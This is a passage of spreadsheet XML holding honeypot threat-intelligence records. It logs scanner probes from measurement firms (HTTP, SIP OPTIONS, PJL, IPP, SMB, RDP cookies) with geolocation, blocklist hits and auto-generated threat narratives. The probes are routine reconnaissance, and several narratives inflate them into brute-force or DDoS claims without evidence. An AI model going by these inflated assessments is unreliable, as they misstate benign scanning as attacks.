'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 95.164.21.98:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.202;rport=44490'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.74.222.213:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 66.94.127.183:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.202,36040)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.202,52762)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (PxBVeGlc,)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.202,48940)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (FnFmxuxU,)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.115.66:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.211.202.140:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.180.55.39:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.202;rport=55739'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8dca"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="Possible brute force attack against POP3 service is occurring, with a failed login attempt being reported as &quot;NA&quot; which suggests no authentication information was provided or attempt was unsuccessful. The lack of authentication details may indicate an automated or scripted attempt to gain access. This could be a sign of reconnaissance by potential malicious actor."/>
    <m/>
  </r>
  <r>
    <x v="123"/>
    <x v="123"/>
    <s v="cheerful.monitoring.internet-measurement.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:59:51"/>
    <d v="2023-08-04T16:46:00"/>
    <d v="2025-04-30T15:59:51"/>
    <n v="1337"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_SOCKS5_H30&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_IRC_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;445&amp;&amp;NA&amp;&amp;161&amp;&amp;1433&amp;&amp;29908&amp;&amp;6379&amp;&amp;443&amp;&amp;5432&amp;&amp;110&amp;&amp;1521&amp;&amp;3306&amp;&amp;9100&amp;&amp;1080&amp;&amp;6667&amp;&amp;143&amp;&amp;25&amp;&amp;21&amp;&amp;5900&amp;&amp;80&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']}"/>
    <n v="140"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="2005-08-31"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;connection&amp;&amp;request&amp;&amp;GET&amp;&amp;query&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_IRC:{'command': '};;', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'llbbkmji', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.142;tag=llbbkmji', 'max-forwards': '0', 'to': 'sip:194.233.76.135', 'via': 'SIP/2.0/UDP 87.236.176.142:5060;branch=z9hG4bKllbbkmji;received=87.236.176.142;rport=56969'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.142,37719)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.142,53879)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': 'vmi1469317.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 109.123.229.33:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2021-11-25 11:34:08"/>
    <s v="2029-11-25 11:34:08"/>
    <s v="2024-10-10 09:48:31"/>
    <s v="['ALEXIS.NS.CLOUDFLARE.COM', 'RUTH.NS.CLOUDFLARE.COM']"/>
    <s v="NAMECHEAP INC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="3"/>
    <s v="NA"/>
    <s v="Kalkofnsvegur 2"/>
    <s v="::ffff:57ec:b08e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No Redis service activity detected, but possible attempts to access or exploit this service are being monitored. _x000a_This could be an attempt by malicious actors to abuse or scan the system for vulnerabilities related to Redis services. _x000a_No actual interaction with Redis services has been recorded so far. &amp;&amp; There is insufficient log data provided to analyze potential malicious activity. _x000a__x000a_However, if I were to explain what this statement typically means:_x000a_No available information indicates any suspicious behavior or security threats have been detected. This could be due to lack of access attempts or no anomalies in the system logs. The absence of logged events may indicate normal system operation within expected parameters. &amp;&amp; No connection attempt detected for IMAP service, indicating potential evasion tactics by malicious actors who may be probing the system's defenses. _x000a_Possible exploitation of default settings or misconfiguration._x000a_Activity seems to lack intent, but warrants further investigation due to its absence from normal traffic patterns. &amp;&amp; This log suggests a probing activity where an attacker is attempting to gather information about the available services. The OPTIONS command is typically used for discovering capabilities and configuration of networked servers. This could be a reconnaissance step in a larger attack. &amp;&amp; A malicious entity is attempting to send a SIP OPTIONS request from IP address 209.145.61.177, possibly for reconnaissance or enumeration purposes._x000a_This could be part of a larger attack aimed at identifying vulnerabilities in the network._x000a_The request may also be used to probe the network's defenses and identify potential targets. &amp;&amp; Possible SIP flood attack, attempting to send a SIP request through TCP to IP address 87.236.176.142 port 5060. This may be an attempt to overwhelm the target system with unnecessary traffic. Malicious activity detected, potentially for scanning or exploitation purposes. &amp;&amp; Possible malicious activity: An attempt to establish a connection using an unusual SIP method, possibly related to a VoIP attack or exploitation of a vulnerability in a communication service._x000a_This action may be an initial step in a larger cyber attack aiming to hijack or disrupt legitimate voice over internet protocol (VoIP) communications._x000a_Further investigation is required to determine the intentions and potential impact."/>
    <s v="DDoS Attack &amp;&amp; Port Scan &amp;&amp; IRCTunnel &amp;&amp; UDP Scan"/>
  </r>
  <r>
    <x v="124"/>
    <x v="124"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:57:07"/>
    <d v="2024-04-12T11:10:00"/>
    <d v="2025-04-30T15:57:07"/>
    <n v="681"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_IRC_H22&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_SIP_H4&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_HTTP_H28&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_IPP_H33&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_IPP_H12&amp;&amp;SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_SIP_H38&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_NTP_H29&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_SIP_H28&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_POP3_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;56023&amp;&amp;143&amp;&amp;1080&amp;&amp;6667&amp;&amp;110&amp;&amp;NA&amp;&amp;631&amp;&amp;3306&amp;&amp;5900&amp;&amp;5432&amp;&amp;1433&amp;&amp;1521&amp;&amp;3389&amp;&amp;48075&amp;&amp;25&amp;&amp;6379&amp;&amp;34214&amp;&amp;34238&amp;&amp;445&amp;&amp;443&amp;&amp;123&amp;&amp;21&amp;&amp;80&amp;&amp;389&amp;&amp;23&amp;&amp;9100&amp;&amp;52278&amp;&amp;44264&amp;&amp;44272"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="135"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Ann Arbor (Old West Side)"/>
    <s v="4984247"/>
    <s v="48104"/>
    <s v="42.2809"/>
    <s v="-83.7489"/>
    <s v="398324"/>
    <s v="Censys, Inc."/>
    <s v="Censys, Inc."/>
    <s v="hosting"/>
    <s v="Censys, Inc"/>
    <s v="2021-09-13"/>
    <s v="CENSY"/>
    <s v="2024-03-29"/>
    <s v="connection&amp;&amp;request&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;login&amp;&amp;stshash&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,46144)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,59978)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=57417'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.26.156.60:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.26.156.60:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '95.164.21.98:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.21.98:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.181.21.224:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.181.21.224:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=58806'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=40827'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '109.123.229.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://109.123.229.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,45108)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=53343'}}&amp;&amp;{Data_HTTP:{'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': 'vmi1469317.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 (compatible; 